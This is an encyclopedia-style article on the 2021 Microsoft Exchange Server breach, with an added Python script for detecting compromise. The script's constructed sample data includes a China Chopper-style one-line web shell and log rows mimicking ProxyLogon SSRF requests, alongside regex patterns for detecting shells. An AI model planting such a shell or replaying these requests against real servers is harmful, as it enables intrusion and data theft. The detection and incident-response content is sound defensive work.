2021 Microsoft Exchange Server data breach
{{Short description|Series of cyberattacks exploiting Microsoft's email and calendar server}}
{{Use American English|date=April 2021}}
{{Use dmy dates|date=March 2021}}
{{Infobox event
| image =
| image_size =
| image_alt =
| caption =
| duration =
| date = {{bulleted list
|5 January 2021 (exploit first reported)
|6 January 2021 (first breach observed)
|2 March 2021 (breach acknowledged)}}
| location = Global
| target =
| also_known_as =
| type = Cyberattack, data breach
| theme =
| cause = Microsoft Exchange Server zero-day vulnerabilities
| first_reporter = Microsoft (public disclosure)
| suspects = Hafnium, and at least nine others.
| outcome =
}}
A global wave of cyberattacks and data breaches began in January 2021 after four zero-day vulnerabilities were discovered in on-premises Microsoft Exchange Server, giving attackers access to user emails and passwords on affected servers, administrator privileges on the server, and a foothold from which to reach other devices on the same network. Attackers typically install a backdoor that keeps them in full control of an affected server even if the server is later patched against the original vulnerabilities. {{As of|2021|3|9}}, it was estimated that 250,000 servers fell victim to the attacks, including servers belonging to around 30,000 organizations in the United States, 7,000 servers in the United Kingdom,{{Cite news|date=12 March 2021|title=Microsoft hack: 3,000 UK email servers remain unsecured|language=en-GB|work=BBC News|url=https://www.bbc.com/news/technology-56372188|access-date=12 March 2021}} as well as the European Banking Authority, the Norwegian Parliament, and Chile's Commission for the Financial Market (CMF).{{Cite news|last=Murphy|first=Hannah|date=9 March 2021|title=Microsoft hack escalates as criminal groups rush to exploit flaws|work=Financial Times|url=https://www.ft.com/content/74fa3de6-dd16-4dc5-9b69-38bde634adc3|url-access=subscription|access-date=10 March 2021}}{{Cite news|last=O'Donnell|first=John|date=8 March 2021|title=European banking regulator EBA targeted in Microsoft hacking|language=en|work=Reuters|url=https://www.reuters.com/article/us-microsoft-hack-eba-idUSKBN2B01RP|access-date=10 March 2021}}{{Cite news|last=Duffy|first=Clare|title=Here's what we know so far about the massive Microsoft Exchange hack|url=https://www.cnn.com/2021/03/10/tech/microsoft-exchange-hafnium-hack-explainer/index.html|access-date=10 March 2021|publisher=CNN|date=10 March 2021}}{{Cite web|title=Chile's bank regulator shares IOCs after Microsoft Exchange hack|url=https://www.bleepingcomputer.com/news/security/chiles-bank-regulator-shares-iocs-after-microsoft-exchange-hack/|access-date=2021-03-17|website=BleepingComputer|language=en-us}}{{Cite web|date=2021-03-14|title=Comisión para el Mercado Financiero sufrió vulneración de ciberseguridad: no se conoce su alcance|url=https://www.biobiochile.cl/noticias/economia/actualidad-economica/2021/03/14/comision-para-el-mercado-financiero-sufrio-vulneracion-de-ciberseguridad-no-se-conoce-su-alcance.shtml|access-date=2021-03-17|website=BioBioChile - La Red de Prensa Más Grande de Chile|language=es}}{{Cite web|last=V|first=Vicente Vera|title=CMF desestima "hasta ahora" el secuestro de datos tras sufrir ciberataque|url=http://www.df.cl/noticias/mercados/banca-fintech/cmf-desestima-hasta-ahora-el-secuestro-de-datos-tras-sufrir-ciberataque/2021-03-15/161131.html|access-date=2021-03-17|website=Diario Financiero|language=Spanish}}
On 2 March 2021, Microsoft released updates for Microsoft Exchange Server 2010, 2013, 2016 and 2019 to patch the vulnerabilities; patching does not retroactively undo damage or remove any backdoors installed by attackers, so a patched server still has to be checked for web shells and other persistence. Small and medium businesses, local institutions, and local governments are known to be the primary victims of the attack, as they often have smaller budgets to secure against cyber threats and typically outsource IT services to local providers that do not have the expertise to deal with cyber attacks.{{Cite web|date=10 March 2021|title=America's small businesses face the brunt of China's Exchange server hacks|url=https://techcrunch.com/2021/03/10/america-small-business-hafnium-exchange-hacks/|access-date=12 March 2021|website=TechCrunch|language=en-US|archive-date=17 March 2021|archive-url=https://web.archive.org/web/20210317134441/http://techcrunch.com/2021/03/10/america-small-business-hafnium-exchange-hacks/|url-status=live}}
On 12 March 2021, Microsoft announced the discovery of "a new family of ransomware" being deployed to servers that had initially been infected, encrypting all files, making the server inoperable and demanding payment to reverse the damage. On 22 March 2021, Microsoft announced that 92% of vulnerable Exchange servers had been either patched or mitigated.{{Cite web|title=Microsoft: 92% of vulnerable Exchange servers are now patched, mitigated|url=https://www.msn.com/en-us/money/other/microsoft-92-25-of-vulnerable-exchange-servers-are-now-patched-mitigated/ar-BB1eUBXR|access-date=2021-03-29|website=www.msn.com}}
Background
Microsoft Exchange is a widely used email server software and a frequent target for cyberattacks on business networks. According to Microsoft, its environment allows attackers to misuse built-in administrative tools or scripts for malicious purposes.{{Cite web|date=25 June 2020|title=How attackers target and exploit Microsoft Exchange servers|url=https://www.helpnetsecurity.com/2020/06/25/target-microsoft-exchange-servers/|access-date=14 March 2021|website=Help Net Security|language=en-US}} Microsoft Exchange has previously been targeted by nation-state threat actors.{{Cite web|last=Cimpanu|first=Catalin|date=9 March 2020|title=Multiple nation-state groups are hacking Microsoft Exchange servers|url=https://www.zdnet.com/article/multiple-nation-state-groups-are-hacking-microsoft-exchange-servers/|url-status=live|access-date=14 March 2021|website=ZDNet|language=en|archive-url=https://web.archive.org/web/20200309071618/https://www.zdnet.com/article/multiple-nation-state-groups-are-hacking-microsoft-exchange-servers/ |archive-date=9 March 2020 }}{{Cite web|last=Cimpanu|first=Catalin|date=7 May 2019|title=Russian cyberspies are using one hell of a clever Microsoft Exchange backdoor|url=https://www.zdnet.com/article/russian-cyberspies-are-using-one-hell-of-a-clever-microsoft-exchange-backdoor/|url-status=live|access-date=14 March 2021|website=ZDNet|language=en|archive-url=https://web.archive.org/web/20190508014609/https://www.zdnet.com/article/russian-cyberspies-are-using-one-hell-of-a-clever-microsoft-exchange-backdoor/ |archive-date=8 May 2019 }}
On 5 January 2021, security testing company DEVCORE reported the vulnerabilities to Microsoft, which confirmed them on 8 January.{{Cite web|last=Krebs|first=Brian|author-link=Brian Krebs|date=8 March 2021|title=A Basic Timeline of the Exchange Mass-Hack|url=https://krebsonsecurity.com/2021/03/a-basic-timeline-of-the-exchange-mass-hack/|url-status=live|access-date=10 March 2021|website=Krebs on Security|language=en-US|archive-url=https://web.archive.org/web/20210308161206/https://krebsonsecurity.com/2021/03/a-basic-timeline-of-the-exchange-mass-hack/ |archive-date=8 March 2021 }} On 6 January 2021, cybersecurity company Volexity detected the first known breach of a Microsoft Exchange Server instance.{{Cite web|last=Krebs|first=Chris|author-link=Chris Krebs|date=5 March 2021|title=At Least 30,000 U.S. Organizations Newly Hacked Via Holes in Microsoft's Email Software|url=https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/|url-status=live|access-date=10 March 2021|website=Krebs on Security|language=en-US|archive-url=https://web.archive.org/web/20210305211313/https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/ |archive-date=5 March 2021 }} By late January, Volexity had detected a breach that allowed attackers to access data from two of its customers and reported its findings to Microsoft. After Microsoft was notified of the breach, Volexity reported that the hackers became less discreet, apparently in anticipation of a patch.
On 2 March 2021, cybersecurity company ESET reported observing multiple threat actors, in addition to Hafnium, exploiting the vulnerabilities. On 10 March 2021, Wired reported that following the patch, additional threat actors were likely to reverse engineer the fix to target unpatched servers. Analysts at two security firms reported observing signs that attackers were preparing to deploy cryptomining software on affected servers.{{Cite magazine|last=Newman|first=Lily Hay|date=10 March 2021|title=It's Open Season for Microsoft Exchange Server Hacks|language=en-us|magazine=Wired|url=https://www.wired.com/story/microsoft-exchange-patch-hacks-ransomware/|access-date=10 March 2021|issn=1059-1028}}
On 10 March 2021, security researcher Nguyen Jang posted proof-of-concept code to Microsoft-owned GitHub demonstrating how the exploit works, consisting of 169 lines of code. The program was intentionally written with errors, allowing security researchers to understand the exploit while preventing malicious actors from using the code to access servers. Later that day, GitHub removed the code, stating that it "contains proof-of-concept code for a recently disclosed vulnerability that is being actively exploited".{{Cite web|date=14 March 2021|title=New PoC for Microsoft Exchange bugs puts attacks in reach of anyone|url=https://www.bleepingcomputer.com/news/security/new-poc-for-microsoft-exchange-bugs-puts-attacks-in-reach-of-anyone/|url-status=live|access-date=15 March 2021|website=BleepingComputer|language=en-us|archive-url=https://web.archive.org/web/20210314194400/https://www.bleepingcomputer.com/news/security/new-poc-for-microsoft-exchange-bugs-puts-attacks-in-reach-of-anyone/ |archive-date=14 March 2021 }}{{Cite web|last=Claburn|first=Thomas|date=12 March 2021|title=Microsoft's GitHub under fire after disappearing proof-of-concept exploit for critical Microsoft Exchange vuln|url=https://www.theregister.com/2021/03/12/github_disappears_exploit/|url-status=live|access-date=15 March 2021|work=The Register|language=en|archive-url=https://web.archive.org/web/20210312003514/https://www.theregister.com/2021/03/12/github_disappears_exploit/ |archive-date=12 March 2021 }} On 13 March, another group independently published exploit code, which required minimal modification to function. 
The CERT Coordination Center's Will Dormann stated that the "exploit is completely out of the bag by now".{{Cite web|date=16 March 2021|title=Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix|url=https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/|url-status=live|access-date=2021-03-16|website=threatpost.com|language=en|archive-url=https://web.archive.org/web/20210316165816/https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/ |archive-date=16 March 2021 }}
The attacks came shortly after the 2020 United States federal government data breach, which also involved a software supply-chain compromise and unauthorized access to victims' Microsoft email accounts. Microsoft stated that there was no connection between the two incidents.{{Cite news|date=6 March 2021|title=Microsoft hack: White House warns of 'active threat' of email attack|language=en-GB|work=BBC News|url=https://www.bbc.com/news/world-us-canada-56304379|access-date=10 March 2021}}
Perpetrator
{{Further|Cyberwarfare and China}}
Microsoft said that the attack was initially perpetrated by Hafnium, an advanced persistent threat (APT) group that Microsoft assesses to be state-sponsored and operating out of China.{{Cite news|date=3 March 2021|title=Microsoft accuses China over email cyber-attacks|language=en-GB|work=BBC News|url=https://www.bbc.com/news/business-56261516|access-date=10 March 2021}}{{Cite news|last=Kevin|first=Collier|date=9 March 2021|title='Really messy': Why the hack of Microsoft's email system is getting worse|work=NBC News|url=https://www.nbcnews.com/tech/security/really-messy-hack-microsofts-email-system-getting-worse-rcna377}}{{Cite web|date=2 March 2021|title=HAFNIUM targeting Exchange Servers with 0-day exploits|url=https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/|access-date=10 March 2021|website=Microsoft Security|language=en-US}} Hafnium is known to install the web shell China Chopper. Microsoft identified Hafnium as "a highly skilled and sophisticated actor" that historically has mostly targeted "entities in the United States for the purpose of exfiltrating information from a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs." Announcing the hack, Microsoft stated that this was "the eighth time in the past 12 months that Microsoft has publicly disclosed nation-state groups targeting institutions critical to civil society." As of 12 March 2021, at least nine other distinct groups, in addition to Hafnium, were exploiting the vulnerabilities, each with its own tactics, techniques and procedures.
The Chinese government denied involvement, calling the accusations "groundless."{{Cite web|date=3 March 2021|title=Foreign Ministry Spokesperson Wang Wenbin's Regular Press Conference on March 3, 2021|url=https://www.fmprc.gov.cn/mfa_eng/xwfw_665399/s2510_665401/t1858251.shtml|url-status=live|access-date=10 March 2021|website=Ministry of Foreign Affairs of the People's Republic of China|archive-url=https://web.archive.org/web/20210303120828/https://www.fmprc.gov.cn/mfa_eng/xwfw_665399/s2510_665401/t1858251.shtml |archive-date=3 March 2021 }}
In a July 19, 2021 joint statement, the US, UK, EU, NATO, and other Western nations accused the Ministry of State Security (MSS) of perpetrating the Exchange breach, along with other cyberattacks, "attributing with a high degree of confidence that malicious cyber actors affiliated with PRC’s MSS conducted cyber espionage operations utilizing the zero-day vulnerabilities in Microsoft Exchange Server disclosed in early March 2021."{{cite news |last=Fried |first=Ina |date=July 19, 2021 |title=U.S. and key allies accuse China of Microsoft Exchange cyberattacks |url=https://www.axios.com/china-cyberattacks-nato-181e71d2-7414-45f3-9463-c8b1d46392c1.html |work=Axios |access-date=July 19, 2021}}{{cite news |last=Tucker |first=Eric |date=July 19, 2021 |title=Microsoft Exchange hack caused by China, US and allies say |url=https://apnews.com/article/microsoft-exchange-hack-biden-china-d533f5361cbc3374fdea58d3fb059f35 |work=Associated Press |access-date=July 19, 2021}}{{cite news |last2=Sanger |first2=David E. |last1=Kanno-Youngs |first1=Zolan |date=July 19, 2021 |title=U.S. Formally Accuses China of Hacking Microsoft |url=https://www.nytimes.com/2021/07/19/us/politics/microsoft-hacking-china-biden.html |work=The New York Times |access-date=July 19, 2021}}{{cite news |last=Liptak |first=Kevin |date=July 19, 2021 |title=US blames China for hacks, opening new front in cyber offensive |url=https://www.cnn.com/2021/07/19/politics/us-china-cyber-offensive/index.html |work=CNN |access-date=July 19, 2021}}
Methodology
Hackers took advantage of four separate zero-day vulnerabilities to compromise Microsoft Exchange servers through their internet-facing web services, notably Outlook Web Access (OWA),{{Cite magazine|last=Greenberg|first=Andy|author-link=Andy Greenberg|date=5 March 2021|title=Chinese Hacking Spree Hit an 'Astronomical' Number of Victims|language=en-us|magazine=Wired|url=https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/|access-date=10 March 2021|issn=1059-1028}} giving them access to victims' entire servers and networks as well as to emails and calendar invitations.{{Cite web|last=Collier|first=Kevin|date=3 March 2021|title=U.S. issues warning after Microsoft says China hacked its mail server program|url=https://www.nbcnews.com/tech/security/u-s-issues-warning-after-microsoft-says-china-hacked-its-n1259522|url-status=live|access-date=10 March 2021|website=NBC News|language=en|archive-url=https://web.archive.org/web/20210303233700/https://www.nbcnews.com/tech/security/u-s-issues-warning-after-microsoft-says-china-hacked-its-n1259522 |archive-date=3 March 2021 }} At first the attacker needs only the address of a server, which can be targeted directly or found by mass-scanning the internet for exposed Exchange servers. The attack then chains the flaws. The first, a server-side request forgery (SSRF) vulnerability tracked as CVE-2021-26855 and dubbed "ProxyLogon", lets an unauthenticated attacker send arbitrary requests through the Exchange front end and authenticate to the back end as the Exchange server itself; a second vulnerability (CVE-2021-26857, an insecure deserialization flaw in the Unified Messaging service) can then be exploited to run code with administrator (SYSTEM) privileges.{{Cite web|title=ProxyLogon|url=https://proxylogon.com/|access-date=11 March 2021|website=ProxyLogon|language=zh-TW}}{{Cite web|title=Critical Microsoft Exchange flaw: What is CVE-2021-26855? {{!}} UpGuard|url=https://www.upguard.com/blog/cve-2021-26855|access-date=2021-03-16|website=www.upguard.com|language=en}} The remaining two vulnerabilities (CVE-2021-26858 and CVE-2021-27065) allow an attacker who has authenticated in this way to write files to any location on the server, so that uploaded code runs automatically with those privileges.
Attackers then typically use this to install a web shell, providing a backdoor to the compromised server,{{Cite web|date=2 March 2021|title=Microsoft says China-backed hackers are exploiting Exchange zero-days|url=https://techcrunch.com/2021/03/02/microsoft-says-china-backed-hackers-are-exploiting-exchange-zero-days/|access-date=10 March 2021|website=TechCrunch|language=en-US}} which gives them continued access for as long as the web shell is left in place and the Exchange server stays online.{{Cite web|date=8 March 2021|title=Hafnium timeline solidifies: A drizzle in February, a deluge in March|url=https://www.scmagazine.com/home/security-news/data-breach/as-hafnium-timeline-crystalizes-signs-of-new-microsoft-exchange-server-attacks-emerge/|access-date=10 March 2021|website=SC Media|language=en-US}}
Through the web shell, commands can be run remotely on the server. Among the actions observed are downloading all emails from the server; dumping credentials from the memory of the server's LSASS process and harvesting users' email addresses; adding users; adding further backdoors to affected systems; moving on to other systems in the network that are not themselves susceptible to the original exploit; and installing ransomware.{{Cite web|date=2 March 2021|title=Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities {{!}} Volexity|url=https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/|url-status=live|access-date=11 March 2021|website=www.volexity.com|language=en-US|archive-url=https://web.archive.org/web/20210302212539/https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ |archive-date=2 March 2021 }} Because patching the Exchange server does not retroactively remove installed backdoors, attackers keep their access until the web shell, any other backdoors, and the user accounts they added have all been removed.{{Cite web|date=9 March 2021|title=30,000 U.S. organizations breached by cyber espionage group Hafnium|url=https://www.securitymagazine.com/articles/94781-000-us-organizations-breached-by-cyber-espionage-group-hafnium?v=preview|url-status=live|access-date=10 March 2021|website=Security Magazine|language=en|archive-url=https://web.archive.org/web/20210413012149/https://www.securitymagazine.com/articles/94781-000-us-organizations-breached-by-cyber-espionage-group-hafnium?v=preview |archive-date=13 April 2021 }}
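The two artifacts described above, the SSRF routing trace left in the Exchange front-end logs and the web shell dropped on disk, are what a responder looks for when deciding whether a server that has since been patched was already compromised. The following Python script is an added example written for this article, not code from Microsoft, Volexity or any of the page's sources. It parses a constructed excerpt of an Exchange HttpProxy log and flags unauthenticated requests whose AnchorMailbox has the ServerInfo~<host>/<path> form (the CVE-2021-26855 indicator that Microsoft's published log check keys on), and scans a constructed set of files under the IIS and Exchange web roots for one-line web shells such as the China Chopper ASPX form. The log columns, paths, IP addresses, file contents and the secondary BackEndCookie heuristic are assumptions made for the example.

```python
import csv
import re

# Constructed HttpProxy excerpt (not real data). Real logs carry many more
# columns; only the columns this check reads are included here.
SAMPLE_HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
#Fields: DateTime,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox,BackEndCookie,HttpStatus
2021-03-01T02:10:11.000Z,203.0.113.5,/owa/auth/x.js,,ServerInfo~a]@EXCH01.corp.example/autodiscover/autodiscover.xml?#~1941962753,,200
2021-03-01T02:12:30.000Z,203.0.113.5,/ecp/y.js,,ServerInfo~EXCH01.corp.example/ecp/DDI/DDIService.svc/SetObject?#~1941962753,,200
2021-03-01T08:00:00.000Z,192.0.2.10,/owa/,CORP\\alice,alice@corp.example,Server~EXCH01.corp.example~1941962753,200
2021-03-01T08:05:00.000Z,192.0.2.11,/ews/exchange.asmx,CORP\\bob,bob@corp.example,Server~EXCH01.corp.example~1941962753,200
"""

# Constructed directory listing (path -> file content); paths are the web roots
# where dropped shells were reported, contents are made up for the example.
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\aspnet_client\web.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page Language="C#" AutoEventWireup="false" %><html><body>Sign in</body></html>',
    r"C:\inetpub\wwwroot\aspnet_client\system_web\notes.txt":
        "plain text, not served as code",
}

# AnchorMailbox "ServerInfo~<host>/<path>": the front end routed the request to a
# server name and path supplied by the client instead of to a mailbox.
SSRF_ANCHOR = re.compile(r"^ServerInfo~[^/]+/")
# Secondary heuristic of this example (assumption): a back-end cookie that smuggles a path.
SSRF_COOKIE = re.compile(r"^Server~[^/~]+/[^~]*~")

WEBSHELL_PATTERNS = [
    (re.compile(r'eval\s*\(\s*Request(\.(Item|Form|QueryString))?\s*\[', re.I),
     "eval of a request parameter (China Chopper style)"),
    (re.compile(r'Page\s+Language\s*=\s*"Jscript"', re.I),
     "JScript ASPX page, unusual under an Exchange web root"),
    (re.compile(r'Process\.Start|ProcessStartInfo', re.I),
     "starts a process from page code"),
]
CODE_EXTENSIONS = (".aspx", ".ashx", ".asmx")


def parse_httpproxy_log(text):
    """Parse an HttpProxy log into dicts. Lines starting with '#' are headers;
    the '#Fields:' line names the CSV columns of the rows that follow."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        if fields is None:
            raise ValueError("data row appears before the #Fields header")
        rows.append(dict(zip(fields, next(csv.reader([line])))))
    return rows


def find_ssrf_indicators(rows):
    """Return log rows carrying the CVE-2021-26855 routing indicator."""
    hits = []
    for row in rows:
        unauthenticated = row.get("AuthenticatedUser", "") == ""
        if unauthenticated and SSRF_ANCHOR.match(row.get("AnchorMailbox", "")):
            hits.append({**row, "reason": "unauthenticated request with ServerInfo~ anchor"})
        elif SSRF_COOKIE.match(row.get("BackEndCookie", "")):
            hits.append({**row, "reason": "back-end cookie carries a path"})
    return hits


def find_webshells(files):
    """Return (path, reasons) for server-side script files matching shell patterns."""
    findings = []
    for path, content in files.items():
        if not path.lower().endswith(CODE_EXTENSIONS):
            continue
        reasons = [why for rx, why in WEBSHELL_PATTERNS if rx.search(content)]
        if reasons:
            findings.append((path, reasons))
    return findings


def triage(log_text, files):
    """Run both checks; a patched server can still be backdoored."""
    ssrf = find_ssrf_indicators(parse_httpproxy_log(log_text))
    shells = find_webshells(files)
    return {"ssrf_hits": ssrf, "webshells": shells,
            "likely_compromised": bool(ssrf or shells)}


if __name__ == "__main__":
    result = triage(SAMPLE_HTTPPROXY_LOG, SAMPLE_FILES)
    for hit in result["ssrf_hits"]:
        print(f'{hit["DateTime"]} {hit["ClientIpAddress"]} {hit["UrlStem"]}: {hit["reason"]}')
    for path, reasons in result["webshells"]:
        print(f"{path}: {'; '.join(reasons)}")
    print("likely compromised:", result["likely_compromised"])
```

An empty result proves nothing: HttpProxy logs roll over, attackers remove their shell once they have added accounts or other persistence, and the criminal crews that followed used the same access. Treat a hit as grounds to image the server and hunt for the other persistence mechanisms listed above (added users, further backdoors, lateral movement) rather than simply deleting the file.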
An automated wave of attacks took place on 27 and 28 February 2021, and on 2 and 3 March 2021 attackers used a script to revisit the addresses they had hit and drop a web shell so that they could return later. Referring to the week ending 7 March, CrowdStrike co-founder Dmitri Alperovitch stated: "Every possible victim that hadn't patched by mid-to-end of last week has already been hit by at least one or several actors".{{Cite web|date=9 March 2021|title=Criminal hacking groups piling on to escalating Microsoft Exchange crisis|url=https://appleinsider.com/articles/21/03/09/criminal-hacking-groups-piling-on-to-escalating-microsoft-exchange-crisis|url-status=live|access-date=11 March 2021|website=AppleInsider|language=en|archive-url=https://web.archive.org/web/20210309170013/https://appleinsider.com/articles/21/03/09/criminal-hacking-groups-piling-on-to-escalating-microsoft-exchange-crisis |archive-date=9 March 2021 }} After the patch was announced, attackers changed tactics while continuing to use the same chain of vulnerabilities.{{Cite web|date=6 March 2021|title=Four new hacking groups have joined an ongoing offensive against Microsoft's email servers|url=https://www.technologyreview.com/2021/03/06/1020442/four-new-hacking-groups-microsoft-email-servers/|url-status=live|access-date=10 March 2021|website=MIT Technology Review|language=en|archive-url=https://web.archive.org/web/20210306205625/https://www.technologyreview.com/2021/03/06/1020442/four-new-hacking-groups-microsoft-email-servers/ |archive-date=6 March 2021 }}
Microsoft Exchange Server 2013, 2016 and 2019 were confirmed to be susceptible, and Microsoft also issued an update for the out-of-support Exchange Server 2010, although the full set of vulnerable editions was yet to be determined.{{Cite web|last=Hollister|first=Sean|date=8 March 2021|title=Microsoft was warned months ago — now, the Hafnium hack has grown to gigantic proportions|url=https://www.theverge.com/2021/3/8/22319934/microsoft-hafnium-hack-exchange-server-email-flaw-white-house|url-status=live|access-date=10 March 2021|website=The Verge|language=en|archive-url=https://web.archive.org/web/20210308212331/https://www.theverge.com/2021/3/8/22319934/microsoft-hafnium-hack-exchange-server-email-flaw-white-house |archive-date=8 March 2021 }} The cloud-based services Exchange Online and Office 365 are not affected,{{Cite web|last=Novet|first=Jordan|date=9 March 2021|title=Microsoft's big email hack: What happened, who did it, and why it matters|url=https://www.cnbc.com/2021/03/09/microsoft-exchange-hack-explained.html|access-date=15 March 2021|website=CNBC|language=en}} although organizations running a hybrid deployment still operate on-premises Exchange servers that are.
Impact
Hackers have exploited the vulnerabilities to spy on a wide range of targets, affecting an estimated 250,000 servers.{{Cite news|last=O'Donnell|first=John|date=8 March 2021|title=European banking regulator EBA targeted in Microsoft hacking|language=en|work=Reuters|url=https://www.reuters.com/article/us-microsoft-hack-eba-idUSKBN2B01RP|access-date=10 March 2021}} Tom Burt, Microsoft's vice president for Customer Security & Trust, wrote that targets had included disease researchers, law offices, universities, defense contractors, non-governmental organizations, and think tanks.{{Cite web|last=Burt|first=Tom|date=2 March 2021|title=New nation-state cyberattacks|url=https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/|url-status=live|access-date=10 March 2021|website=Microsoft On the Issues|language=en-US|archive-url=https://web.archive.org/web/20210302211855/https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/ |archive-date=2 March 2021 }}{{Cite news|date=9 March 2021|title=Victims of Microsoft hack scramble to plug security holes|work=CBS News|url=https://www.cbsnews.com/news/microsoft-hack-victims-plug-security-holes/}}
Automatic updates are typically disabled by server administrators to avoid disruption from downtime and from faulty updates,{{Cite web|last=Leonhard|first=Woody|date=2017-12-11|title=It's time: Make sure Windows Auto Update is turned off|url=https://www.computerworld.com/article/3241241/its-time-make-sure-windows-auto-update-is-turned-off.html|access-date=2021-03-16|website=Computerworld|language=en}} and updates are by convention installed manually after being tested against the existing software and server setup.{{Cite web|date=2005-08-01|title=Automatic Updates for Servers?|url=https://techgenix.com/automaticupdatesforservers/|access-date=2021-03-16|website=TechGenix|language=en-us}} Smaller organizations often lack the budget to do this in-house and outsource it to local IT providers without cybersecurity expertise, so patching is frequently deferred until it becomes a necessity, if ever. Small and medium businesses, and local institutions such as schools and local governments, are therefore known to be the primary victims of the attack, as they are the least likely to have applied the patch. Rural victims are noted to be "largely on their own", as they typically have no access to IT service providers.
On 11 March 2021, Check Point Research revealed that in the prior 24 hours "the number of exploitation attempts on organizations it tracks tripled every two to three hours."{{Cite web|first1=Brian|last1=Fung|first2=Alex|last2=Marquardt|title=White House warns organizations have 'hours, not days' to fix vulnerabilities as Microsoft Exchange attacks increase|url=https://www.kmov.com/white-house-warns-organizations-have-hours-not-days-to-fix-vulnerabilities-as-microsoft-exchange-attacks/article_2fb3edc0-d1bb-5578-b504-c9e38013bacf.html|access-date=13 March 2021|website=KMOV.com|language=en}}{{Cite web|date=11 March 2021|title=Exploits on Organizations Worldwide Tripled every Two Hours after Microsoft's Revelation of Four Zero-days|url=https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/|access-date=13 March 2021|website=Check Point Software|language=en-US}}
Check Point Research has observed the United States as being the most attacked country with 17% of all exploit attempts, followed by Germany with 6%, the United Kingdom and the Netherlands both at 5%, and Russia with 4% of all exploits; government/military is the most targeted sector with 23% of exploit attempts, followed by manufacturing at 15%, banking and financial services at 14%, software vendors with 7% and healthcare at 6%.{{Cite web|date=2021-03-11|title=Exploits on Organizations Worldwide Grow Tenfold after Microsoft's Revelation of Four Zero-days|url=https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/|access-date=2021-03-16|website=Check Point Software|language=en-US}}
The attack was discovered after attackers were observed downloading all emails belonging to specific users from separate corporate Exchange servers. An undisclosed Washington think tank reported that attackers had sent convincing emails to its contacts in a social engineering attack encouraging recipients to click on a link. On 11 March 2021, Norway's parliament, the Storting, reported being a victim of the hack, stating that "data has been extracted."{{Cite press release|url=https://www.stortinget.no/nn/In-English/About-the-Storting/News-archive/Front-page-news/2020-2021/new-cyberattack-on-the-storting/|date=March 11, 2021|title=New cyberattack on the Storting}}
The European Banking Authority also reported that it had been targeted in the attack, later stating in a press release that the scope of impact on its systems was "limited" and that "the confidentiality of the EBA systems and data has not been compromised".{{Cite web|date=9 March 2021|title=Cyber-attack on the European Banking Authority – UPDATE 3|url=https://www.eba.europa.eu/cyber-attack-european-banking-authority-update-3|access-date=11 March 2021|website=European Banking Authority|language=en}}
Security company ESET identified "at least 10" advanced persistent threat groups compromising IT, cybersecurity, energy, software development, public utility, real estate, telecommunications and engineering businesses, as well as Middle Eastern and South American governmental agencies. One APT group was identified deploying PowerShell downloaders, using affected servers for cryptocurrency mining.{{Cite web|date=10 March 2021|title=More hacking groups join Microsoft Exchange attack frenzy|url=https://www.bleepingcomputer.com/news/security/more-hacking-groups-join-microsoft-exchange-attack-frenzy/|url-status=live|access-date=11 March 2021|website=BleepingComputer|language=en-us|archive-url=https://web.archive.org/web/20210310144247/https://www.bleepingcomputer.com/news/security/more-hacking-groups-join-microsoft-exchange-attack-frenzy/ |archive-date=10 March 2021 }} Cybereason CEO Lior Div noted that APT group Hafnium "targeted small and medium-sized enterprises ... The assault against Microsoft Exchange is 1,000 times more devastating than the SolarWinds attack."{{Cite web|first=Lance|last=Whitney|date=8 March 2021|title=How the Microsoft Exchange hack could impact your organization|url=https://www.techrepublic.com/article/how-the-microsoft-exchange-hack-could-impact-your-organization/|url-status=live|access-date=11 March 2021|website=TechRepublic|language=en|archive-url=https://web.archive.org/web/20210309003817/https://www.techrepublic.com/article/how-the-microsoft-exchange-hack-could-impact-your-organization/ |archive-date=9 March 2021 }}
On 12 March 2021, Microsoft Security Intelligence announced "a new family of ransomware" called DearCry being deployed to the servers that had been initially infected, encrypting device contents, making servers unusable and demanding payment to recover files.{{Cite web|date=12 March 2021|title=Microsoft warns of ransomware attacks as Exchange hack escalates|url=https://www.itpro.co.uk/security/ransomware/358876/microsoft-warns-of-ransomware-attacks-as-exchange-hack-escalates|url-status=live|access-date=12 March 2021|website=IT PRO|language=en|archive-url=https://web.archive.org/web/20210312153946/https://www.itpro.co.uk/security/ransomware/358876/microsoft-warns-of-ransomware-attacks-as-exchange-hack-escalates |archive-date=12 March 2021 }} Microsoft stated: "There is no guarantee that paying the ransom will give you access to your files."{{Cite web|date=11 March 2021|title=Ransom:Win32/DoejoCrypt.A|url=https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&ThreatID=2147777392|url-status=live|access-date=12 March 2021|website=Microsoft Security Intelligence|archive-url=https://web.archive.org/web/20210312075611/https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&ThreatID=2147777392 |archive-date=12 March 2021 }}
